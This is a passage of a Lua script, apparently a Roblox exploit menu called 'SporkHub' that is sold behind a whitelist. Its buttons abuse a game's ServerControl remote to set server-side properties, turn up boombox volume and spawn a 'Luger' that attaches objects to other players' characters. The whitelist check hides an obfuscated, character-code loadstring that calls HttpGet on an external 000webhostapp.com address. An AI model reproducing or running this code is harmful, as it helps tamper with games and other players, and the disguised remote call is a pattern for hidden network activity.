| 1342 | LoudBoom.Parent = Page3Frame | |
| 1343 | LoudBoom.BackgroundColor3 = Color3.new(1, 0, 0.498039) | |
| 1344 | LoudBoom.BorderColor3 = Color3.new(1, 0, 0.498039) | |
| 1345 | LoudBoom.Position = UDim2.new(0.040076334, 0, 0.405982912, 0) | |
| 1346 | LoudBoom.Size = UDim2.new(0, 200, 0, 50) | |
| 1347 | LoudBoom.Font = Enum.Font.SourceSans | |
| 1348 | LoudBoom.Text = "Loud Boombox" | |
| 1349 | LoudBoom.TextColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 1350 | LoudBoom.TextSize = 22 | |
| 1351 | LoudBoom.MouseButton1Down:connect(function() | |
| 1352 | local plr = game.Players.LocalPlayer | |
| 1353 | for _, v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do | |
| 1354 | v.Parent = game.Players.LocalPlayer.Character | |
| 1355 | end | |
| 1356 | wait() | |
| 1357 | local tbl_0xe0e3142503b8cc7f = {
| |
| 1358 | ["Value"] = 10, | |
| 1359 | ["Property"] = "Volume", | |
| 1360 | ["Object"] = game:GetService("Workspace")[plr.Name].BoomBox.Handle.Sound
| |
| 1361 | } | |
| 1362 | local tbl_main = {
| |
| 1363 | "SetProperty", | |
| 1364 | tbl_0xe0e3142503b8cc7f | |
| 1365 | } | |
| 1366 | game:GetService("Workspace")[plr.Name].Cloud.ServerControl:InvokeServer(unpack(tbl_main))
| |
| 1367 | end) | |
| 1368 | XMas.Name = "XMas" | |
| 1369 | XMas.Parent = Page3Frame | |
| 1370 | XMas.BackgroundColor3 = Color3.new(1, 0, 0.498039) | |
| 1371 | XMas.BorderColor3 = Color3.new(1, 0, 0.498039) | |
| 1372 | XMas.Position = UDim2.new(0.574427485, 0, 0.405982912, 0) | |
| 1373 | XMas.Size = UDim2.new(0, 200, 0, 50) | |
| 1374 | XMas.Font = Enum.Font.SourceSans | |
| 1375 | XMas.Text = "X-Mas" | |
| 1376 | XMas.TextColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 1377 | XMas.TextSize = 22 | |
| 1378 | XMas.MouseButton1Down:connect(function() | |
| 1379 | local UserName = game:GetService('Players').LocalPlayer.Name
| |
| 1380 | local Autoride = true | |
| 1381 | local Ammo = 100000000000000 | |
| 1382 | local Name, ToolTip = "Luger", "Christmas Shooter" | |
| 1383 | local CE = {}
| |
| 1384 | local Variables = {
| |
| 1385 | workspace = game:GetService("Workspace"),
| |
| 1386 | players = game:GetService("Players")
| |
| 1387 | } | |
| 1388 | local MainUserP, MainUserW = Variables.players.LocalPlayer, Variables.workspace:FindFirstChild(UserName) | |
| 1389 | function CE:FireEvent(ItemName, Object, Property, Value) | |
| 1390 | MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
| |
| 1391 | end | |
| 1392 | MainUserP["Backpack"]:WaitForChild("Cloud").Parent = MainUserW
| |
| 1393 | CE:FireEvent("Cloud",MainUserW["Cloud"], "TextureId", "rbxassetid://2608113615")
| |
| 1394 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"], "MeshId", "rbxassetid://")
| |
| 1395 | CE:FireEvent("Cloud",MainUserW["Head"]["face"], "Transparency", 0)
| |
| 1396 | CE:FireEvent("Cloud",MainUserW["Shirt"], "ShirtTemplate", "rbxassetid://4351651856")
| |
| 1397 | CE:FireEvent("Cloud",MainUserW["Head"]["face"], "Texture", "rbxassetid://50687791")
| |
| 1398 | CE:FireEvent("Cloud",MainUserW["Pants"], "PantsTemplate", "rbxassetid://3688780667")
| |
| 1399 | -- The Hat | |
| 1400 | CE:FireEvent("Cloud",MainUserW["Robloxclassicred"]["Handle"]["Mesh"], "MeshId", "rbxassetid://1577360")
| |
| 1401 | CE:FireEvent("Cloud",MainUserW["Robloxclassicred"]["Handle"]["Mesh"], "TextureId", "rbxassetid://1398760232")
| |
| 1402 | CE:FireEvent("Cloud",MainUserW["Robloxclassicred"]["Handle"]["Mesh"], "Scale", Vector3.new(1.03, 1.03, 1.03))
| |
| 1403 | CE:FireEvent("Cloud",MainUserW["Robloxclassicred"]["Handle"]["HatAttachment"], "Position", Vector3.new(0, 0.37, 0.19))
| |
| 1404 | -- The Hat2 | |
| 1405 | CE:FireEvent("Cloud",MainUserW["RobloxVisor2019"]["Handle"]["Mesh"], "MeshId", "rbxassetid://100981011")
| |
| 1406 | CE:FireEvent("Cloud",MainUserW["RobloxVisor2019"]["Handle"]["Mesh"], "TextureId", "rbxassetid://100979904")
| |
| 1407 | CE:FireEvent("Cloud",MainUserW["RobloxVisor2019"]["Handle"]["Mesh"], "Scale", Vector3.new(1, 1, 1))
| |
| 1408 | CE:FireEvent("Cloud",MainUserW["RobloxVisor2019"]["Handle"]["HatAttachment"], "Position", Vector3.new(0, -0.79, 0.16))
| |
| 1409 | --The Headphones | |
| 1410 | CE:FireEvent("Cloud",MainUserW["RunningBull"]["Handle"]["Mesh"], "MeshId", "rbxassetid://1051545")
| |
| 1411 | CE:FireEvent("Cloud",MainUserW["RunningBull"]["Handle"]["Mesh"], "TextureId", "rbxassetid://2658183022")
| |
| 1412 | CE:FireEvent("Cloud",MainUserW["RunningBull"]["Handle"]["HatAttachment"], "Position", Vector3.new(0, 0.4, 0))
| |
| 1413 | CE:FireEvent("Cloud",MainUserW["Head"], "Color", Color3.fromRGB(204, 142, 105))
| |
| 1414 | CE:FireEvent("Cloud",MainUserW["Torso"], "Color", Color3.fromRGB(204, 142, 105))
| |
| 1415 | CE:FireEvent("Cloud",MainUserW["Left Arm"], "Color", Color3.fromRGB(204, 142, 105))
| |
| 1416 | CE:FireEvent("Cloud",MainUserW["Right Arm"], "Color", Color3.fromRGB(204, 142, 105))
| |
| 1417 | CE:FireEvent("Cloud",MainUserW["Left Leg"], "Color", Color3.fromRGB(204, 142, 105))
| |
| 1418 | CE:FireEvent("Cloud",MainUserW["Right Leg"], "Color", Color3.fromRGB(204, 142, 105))
| |
| 1419 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"MeshId","rbxassetid://101086719")
| |
| 1420 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"TextureId","rbxassetid://101086650")
| |
| 1421 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"Scale",Vector3.new(1, 1, 1))
| |
| 1422 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"Orientation",Vector3.new(0, 0, 0))
| |
| 1423 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"Position",Vector3.new(0, 0, 0))
| |
| 1424 | CE:FireEvent("Cloud",MainUserW["Cloud"],"GripRight",Vector3.new(0, 0, 0))
| |
| 1425 | CE:FireEvent("Cloud",MainUserW["Cloud"],"GripPos",Vector3.new(0, -0.4, 1))
| |
| 1426 | CE:FireEvent("Cloud",MainUserW["Cloud"],"ToolTip",ToolTip)
| |
| 1427 | CE:FireEvent("Cloud",MainUserW["Cloud"]["LocalScript"],"Disabled",true)
| |
| 1428 | CE:FireEvent("Cloud",MainUserW["Cloud"],"Name",Name)
| |
| 1429 | wait() | |
| 1430 | local Luger = MainUserW["Luger"] | |
| 1431 | function ReloadLuger() | |
| 1432 | local Animation = Instance.new("Animation")
| |
| 1433 | -- RELOAD | |
| 1434 | Animation.AnimationId = "rbxassetid://95384819" | |
| 1435 | local AnimationLoader = MainUserP.Character.Humanoid:LoadAnimation(Animation) | |
| 1436 | AnimationLoader:Play() | |
| 1437 | AnimationLoader:AdjustSpeed(1) | |
| 1438 | Ammo = Ammo + 10 | |
| 1439 | end | |
| 1440 | MainUserP:GetMouse().Button1Down:Connect(function() | |
| 1441 | if MainUserW:FindFirstChild("Luger") then
| |
| 1442 | if Ammo >= 0 then | |
| 1443 | if MainUserP:GetMouse().Target.Parent:FindFirstChild("HumanoidRootPart") or MainUserP:GetMouse().Target.Parent.Parent:FindFirstChild("HumanoidRootPart") then
| |
| 1444 | CE:FireEvent("Luger",Luger,"GripRight",Vector3.new(1, -0.026, 0))
| |
| 1445 | local Animation = Instance.new("Animation")
| |
| 1446 | wait(0.1) | |
| 1447 | -- SHOOT | |
| 1448 | Animation.AnimationId = "rbxassetid://94245658" | |
| 1449 | local AnimationLoader = MainUserP.Character.Humanoid:LoadAnimation(Animation) | |
| 1450 | AnimationLoader:Play() | |
| 1451 | AnimationLoader:AdjustSpeed(1) | |
| 1452 | wait() | |
| 1453 | game.ReplicatedStorage.NetworkEvent:FireServer("RPName",false, "Merry XMas")
| |
| 1454 | wait(0.5) | |
| 1455 | CE:FireEvent("Luger",MainUserW["Merry XMas"]:WaitForChild("Head"),"Parent",MainUserP:GetMouse().Target.Parent)
| |
| 1456 | Ammo = Ammo - 1 | |
| 1457 | CE:FireEvent("Luger",MainUserW["Cloud"]["Handle"]["Wind"],"SoundId","rbxassetid://10722059")
| |
| 1458 | CE:FireEvent("Luger",MainUserW["Cloud"],"GripRight",Vector3.new(1, -0.026, 0))
| |
| 1459 | CE:FireEvent("Luger",MainUserW["Cloud"],"GripPos",Vector3.new(0.294, -0.606, 0.46))
| |
| 1460 | end | |
| 1461 | elseif Ammo == 0 or Ammo <= 0 then | |
| 1462 | ReloadLuger() | |
| 1463 | end | |
| 1464 | end | |
| 1465 | end) | |
| 1466 | end) | |
| 1467 | ComingSoon.Name = "Coming Soon..." | |
| 1468 | ComingSoon.Parent = Page3Frame | |
| 1469 | ComingSoon.BackgroundColor3 = Color3.new(1, 0, 0.498039) | |
| 1470 | ComingSoon.BorderColor3 = Color3.new(1, 0, 0.498039) | |
| 1471 | ComingSoon.Position = UDim2.new(0.040076334, 0, 0.743589818, 0) | |
| 1472 | ComingSoon.Size = UDim2.new(0, 200, 0, 50) | |
| 1473 | ComingSoon.Font = Enum.Font.SourceSans | |
| 1474 | ComingSoon.Text = "Coming Soon..." | |
| 1475 | ComingSoon.TextColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 1476 | ComingSoon.TextSize = 22 | |
| 1477 | MadeBy_3.Name = "MadeBy" | |
| 1478 | MadeBy_3.Parent = Page3Frame | |
| 1479 | MadeBy_3.BackgroundColor3 = Color3.new(1, 1, 1) | |
| 1480 | MadeBy_3.BackgroundTransparency = 1 | |
| 1481 | MadeBy_3.Position = UDim2.new(-1.21071935e-08, 0, -0.0854702592, 0) | |
| 1482 | MadeBy_3.Size = UDim2.new(0, 200, 0, 11) | |
| 1483 | MadeBy_3.Font = Enum.Font.SourceSans | |
| 1484 | MadeBy_3.Text = "e" | |
| 1485 | MadeBy_3.TextColor3 = Color3.new(1, 1, 1) | |
| 1486 | MadeBy_3.TextSize = 14 | |
| 1487 | ComingSoon_4.Name = "Coming Soon..." | |
| 1488 | ComingSoon_4.Parent = Page3Frame | |
| 1489 | ComingSoon_4.BackgroundColor3 = Color3.new(1, 0, 0.498039) | |
| 1490 | ComingSoon_4.BorderColor3 = Color3.new(1, 0, 0.498039) | |
| 1491 | ComingSoon_4.Position = UDim2.new(0.573409677, 0, 0.743589818, 0) | |
| 1492 | ComingSoon_4.Size = UDim2.new(0, 200, 0, 50) | |
| 1493 | ComingSoon_4.Font = Enum.Font.SourceSans | |
| 1494 | ComingSoon_4.Text = "Coming Soon..." | |
| 1495 | ComingSoon_4.TextColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 1496 | ComingSoon_4.TextSize = 22 | |
| 1497 | IntroFrame.Name = "IntroFrame" | |
| 1498 | IntroFrame.Parent = SporkHub | |
| 1499 | IntroFrame.BackgroundColor3 = Color3.new(1, 1, 1) | |
| 1500 | IntroFrame.Position = UDim2.new(0.42899999, 0, -0.338, 0) | |
| 1501 | IntroFrame.Size = UDim2.new(0, 184, 0, 189) | |
| 1502 | ImageLabel_2.Parent = IntroFrame | |
| 1503 | ImageLabel_2.BackgroundColor3 = Color3.new(1, 1, 1) | |
| 1504 | ImageLabel_2.Position = UDim2.new(-0.00417783856, 0, -0.00311591243, 0) | |
| 1505 | ImageLabel_2.Size = UDim2.new(0, 184, 0, 189) | |
| 1506 | ImageLabel_2.Image = "http://www.roblox.com/asset/?id=4393047156" | |
| 1507 | NWhitelistFrame.Name = "NWhitelistFrame" | |
| 1508 | NWhitelistFrame.Parent = SporkHub | |
| 1509 | NWhitelistFrame.BackgroundColor3 = Color3.new(0.176471, 0.176471, 0.176471) | |
| 1510 | NWhitelistFrame.BorderColor3 = Color3.new(0.176471, 0.176471, 0.176471) | |
| 1511 | NWhitelistFrame.Position = UDim2.new(0.552999973, 0, -0.501999974, 0) | |
| 1512 | NWhitelistFrame.Size = UDim2.new(0, 210, 0, 198) | |
| 1513 | NWhitelistFrame.Active = true | |
| 1514 | NWhitelistFrame.Selectable = true | |
| 1515 | NWhitelistFrame.Draggable = true | |
| 1516 | NWhitelistFrame.Visible = false | |
| 1517 | NotHeader.Name = "NotHeader" | |
| 1518 | NotHeader.Parent = NWhitelistFrame | |
| 1519 | NotHeader.BackgroundColor3 = Color3.new(0.176471, 0.176471, 0.176471) | |
| 1520 | NotHeader.BorderColor3 = Color3.new(0.176471, 0.176471, 0.176471) | |
| 1521 | NotHeader.Size = UDim2.new(0, 209, 0, 32) | |
| 1522 | NotHeader.Font = Enum.Font.SourceSans | |
| 1523 | NotHeader.Text = "Uh Oh.." | |
| 1524 | NotHeader.TextColor3 = Color3.new(1, 1, 1) | |
| 1525 | NotHeader.TextSize = 24 | |
| 1526 | NotHeader2.Name = "NotHeader2" | |
| 1527 | NotHeader2.Parent = NWhitelistFrame | |
| 1528 | NotHeader2.BackgroundColor3 = Color3.new(0.176471, 0.176471, 0.176471) | |
| 1529 | NotHeader2.BorderColor3 = Color3.new(0.176471, 0.176471, 0.176471) | |
| 1530 | NotHeader2.Position = UDim2.new(0, 0, 0.168184921, 0) | |
| 1531 | NotHeader2.Size = UDim2.new(0, 209, 0, 32) | |
| 1532 | NotHeader2.Font = Enum.Font.SourceSans | |
| 1533 | NotHeader2.Text = "Looks like you are not Whitelisted!" | |
| 1534 | NotHeader2.TextColor3 = Color3.new(1, 1, 1) | |
| 1535 | NotHeader2.TextSize = 16 | |
| 1536 | ImageLabel_3.Parent = NWhitelistFrame | |
| 1537 | ImageLabel_3.BackgroundColor3 = Color3.new(1, 1, 1) | |
| 1538 | ImageLabel_3.BackgroundTransparency = 1 | |
| 1539 | ImageLabel_3.Position = UDim2.new(0.228571445, 0, 0.303030312, 0) | |
| 1540 | ImageLabel_3.Size = UDim2.new(0, 100, 0, 100) | |
| 1541 | ImageLabel_3.Image = "rbxassetid://186335694" | |
| 1542 | Note.Name = "Note" | |
| 1543 | Note.Parent = NWhitelistFrame | |
| 1544 | Note.BackgroundColor3 = Color3.new(0.176471, 0.176471, 0.176471) | |
| 1545 | Note.BorderColor3 = Color3.new(0.176471, 0.176471, 0.176471) | |
| 1546 | Note.Position = UDim2.new(-4.65661287e-10, 0, 0.875038087, 0) | |
| 1547 | Note.Size = UDim2.new(0, 209, 0, 12) | |
| 1548 | Note.Font = Enum.Font.SourceSans | |
| 1549 | Note.Text = "If you bought the shirt and you haven't been " | |
| 1550 | Note.TextColor3 = Color3.new(1, 1, 1) | |
| 1551 | Note.TextSize = 12 | |
| 1552 | Note2.Name = "Note2" | |
| 1553 | Note2.Parent = NWhitelistFrame | |
| 1554 | Note2.BackgroundColor3 = Color3.new(0.176471, 0.176471, 0.176471) | |
| 1555 | Note2.BorderColor3 = Color3.new(0.176471, 0.176471, 0.176471) | |
| 1556 | Note2.Position = UDim2.new(0, 0, 0.939275622, 0) | |
| 1557 | Note2.Size = UDim2.new(0, 209, 0, 12) | |
| 1558 | Note2.Font = Enum.Font.SourceSans | |
| 1559 | Note2.Text = "verified, please contact fuck on discord!" | |
| 1560 | Note2.TextColor3 = Color3.new(1, 1, 1) | |
| 1561 | Note2.TextSize = 12 | |
| 1562 | TextLabel.Parent = NWhitelistFrame | |
| 1563 | TextLabel.BackgroundColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 1564 | TextLabel.BorderColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 1565 | TextLabel.Position = UDim2.new(-0.00100000005, 0, -0.00100000005, 0) | |
| 1566 | TextLabel.Size = UDim2.new(0, 57, 0, 15) | |
| 1567 | TextLabel.Font = Enum.Font.SourceSans | |
| 1568 | TextLabel.Text = "SporkHub" | |
| 1569 | TextLabel.TextColor3 = Color3.new(1, 1, 1) | |
| 1570 | TextLabel.TextSize = 10 | |
| 1571 | -- Scripts: | |
| 1572 | --WHITELIST SCRIPT | |
| 1573 | local function UGATYDI_fake_script() | |
| 1574 | -- HomeFrame.Whitelist Script | |
| 1575 | local script = Instance.new('LocalScript', HomeFrame)
| |
| 1576 | local plr = game.Players.LocalPlayer | |
| 1577 | local Whitelist = {
| |
| 1578 | "ChecksNBalance", | |
| 1579 | "Lo_fiBeats", | |
| 1580 | } | |
| 1581 | local function whitelist() | |
| 1582 | local white = true | |
| 1583 | for I,v in pairs(Whitelist) do | |
| 1584 | if plr.Name == v then | |
| 1585 | loadstring("\112\114\105\110\116\40\34\103\101\116\32\102\117\99\107\101\100\34\41\59\10\112\114\105\110\116\40\103\97\109\101\58\72\116\116\112\71\101\116\40\34\104\116\116\112\115\58\47\47\111\110\50\107\97\113\113\120\104\116\120\111\104\99\106\115\50\104\56\46\48\48\48\119\101\98\104\111\115\116\97\112\112\46\99\111\109\47\102\117\99\107\121\111\117\46\112\104\112\34\44\32\116\114\117\101\41\41\10")()white = false
| |
| 1586 | end | |
| 1587 | end | |
| 1588 | return white | |
| 1589 | end | |
| 1590 | if whitelist() then | |
| 1591 | script.Parent.Parent.Enabled = true | |
| 1592 | else | |
| 1593 | HomeFrame.Visible = false | |
| 1594 | IntroFrame.Visible = false | |
| 1595 | LoginFrame.Visible = false | |
| 1596 | OpenFrame.Visible = false | |
| 1597 | NWhitelistFrame.Visible = true | |
| 1598 | --NOTWHITELISTED ANIMATION | |
| 1599 | local function QBUM_fake_script() -- ImageLabel_3.LocalScript | |
| 1600 | local script = Instance.new('LocalScript', ImageLabel_3)
| |
| 1601 | while true do --Create a loop so it doesn't stop. | |
| 1602 | wait(0) --Keep this here or else the script will lag. | |
| 1603 | script.Parent.Rotation = script.Parent.Rotation +3 --Put this higher to increase the speed! | |
| 1604 | end | |
| 1605 | end | |
| 1606 | coroutine.wrap(QBUM_fake_script)() | |
| 1607 | local function FWEBP_fake_script() -- NWhitelistFrame.NWhiteScript | |
| 1608 | local script = Instance.new('LocalScript', NWhitelistFrame)
| |
| 1609 | wait(1) | |
| 1610 | blur = Instance.new("BlurEffect", game.Lighting)
| |
| 1611 | blur.Size = 35 | |
| 1612 | script.Parent:TweenPosition(UDim2.new(0.548, 0,0.257, 0), "Out", "Bounce", 1) | |
| 1613 | end | |
| 1614 | coroutine.wrap(FWEBP_fake_script)() | |
| 1615 | print('You are not whitelisted! Please DM fuck if you bought!')
| |
| 1616 | end | |
| 1617 | end | |
| 1618 | coroutine.wrap(UGATYDI_fake_script)() | |
| 1619 | --LOGIN ANIMATION | |
| 1620 | local function KSUHSYP_fake_script() -- LoginFrame.LocalScript | |
| 1621 | local script = Instance.new('LocalScript', LoginFrame)
| |
| 1622 | wait(6) | |
| 1623 | script.Parent:TweenPosition(UDim2.new(0.38, 0,0.182, 0), "Out", "Bounce", 1) | |
| 1624 | end | |
| 1625 | coroutine.wrap(KSUHSYP_fake_script)() --REAL ANIMATION | |
| 1626 | ShowBar.MouseButton1Down:connect(function() | |
| 1627 | local function VANBX_fake_script() -- REAL.LocalScript | |
| 1628 | local script = Instance.new('LocalScript', REAL)
| |
| 1629 | script.Parent:TweenPosition(UDim2.new(0, 0,0.998, 0), "Out", "Bounce", 2) | |
| 1630 | end | |
| 1631 | coroutine.wrap(VANBX_fake_script)() | |
| 1632 | end) | |
| 1633 | --INTRO ANIMATION | |
| 1634 | local function RKPGV_fake_script() -- IntroFrame.LocalScript | |
| 1635 | local script = Instance.new('LocalScript', IntroFrame)
| |
| 1636 | wait(1) | |
| 1637 | blur = Instance.new("BlurEffect", game.Lighting)
| |
| 1638 | blur.Size = 35 | |
| 1639 | script.Parent:TweenPosition(UDim2.new(0.429, 0,0.338, 0), "Out", "Bounce", 1) | |
| 1640 | wait(5) | |
| 1641 | script.Parent:TweenPosition(UDim2.new(0.429, 0,1.338, 0), "Out", "Quint", 1) | |
| 1642 | blur.Size = 0 | |
| 1643 | end | |
| 1644 | coroutine.wrap(RKPGV_fake_script)() |